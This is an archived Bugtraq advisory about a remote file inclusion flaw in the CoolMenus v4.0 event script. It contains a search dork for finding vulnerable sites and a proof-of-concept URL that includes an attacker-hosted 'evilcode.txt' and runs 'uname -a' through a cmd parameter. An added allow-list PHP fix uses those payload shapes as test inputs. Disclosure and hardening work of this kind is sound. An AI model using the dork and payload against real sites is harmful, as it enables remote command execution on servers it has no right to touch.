Bugtraq mailing list archives
[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP)
From: botan () linuxmail org
Date: 28 Apr 2006 17:47:06 -0000
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html

#CoolMenus Event Remote File Include Vulnerability#

#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]
#Script : CoolMenus v4.0 Event Script
#Risk : High
#Class : Remote
#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..
#d0rk : "/event/index.php?page="

I.

    require("event_inc.php");
    echo "Events";
    $start = filectime($news);
    $jetzt = time();
    $update = "$start"+"$timespan";
    if($jetzt >= $update) {include("event_html.php");}

II. Proof of Concept:

http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a
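A hardened way to handle the `page` parameter, as an added example that is not part of the original advisory or of the CoolMenus code. It assumes `index.php` passes the request's `page` value to an include, which the excerpt above does not show; `resolve_event_page()`, the `EVENT_PAGES` map and `event_archive.php` are hypothetical names.

```php
<?php
// Added example: hypothetical allow-list resolver for the ?page= parameter.
declare(strict_types=1);

// Allow-list: accepted request value => file shipped with the application.
const EVENT_PAGES = [
    'list'    => 'event_html.php',
    'archive' => 'event_archive.php',   // hypothetical file name
];

/**
 * Map an untrusted ?page= value to a local file path, or null if rejected.
 * The request value is only ever used as a lookup key, never as a path.
 */
function resolve_event_page($requested, string $baseDir): ?string
{
    // Arrays (?page[]=x) and any value not on the allow-list are rejected.
    if (!is_string($requested) || !array_key_exists($requested, EVENT_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . EVENT_PAGES[$requested]);
    // realpath() returns false for missing files; also confirm the resolved
    // path stays inside the base directory (guards against symlinked entries).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample inputs, including the value shape used in the PoC above.
// 'list' is allowed only when event_html.php exists beside this script.
$samples = ['list', 'evilcode.txt?', 'http://host.example/evilcode.txt?',
            '../../etc/passwd', ['x']];
foreach ($samples as $value) {
    $target = resolve_event_page($value, __DIR__);
    printf("%-40s => %s\n", json_encode($value),
           $target === null ? 'rejected' : 'allowed');
}

// In the front controller (sketch):
//   $file = resolve_event_page($_GET['page'] ?? 'list', __DIR__);
//   if ($file === null) { http_response_code(404); exit; }
//   require $file;
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2.0) stops include/require from fetching remote URLs, but an allow-list is still needed to block local file inclusion.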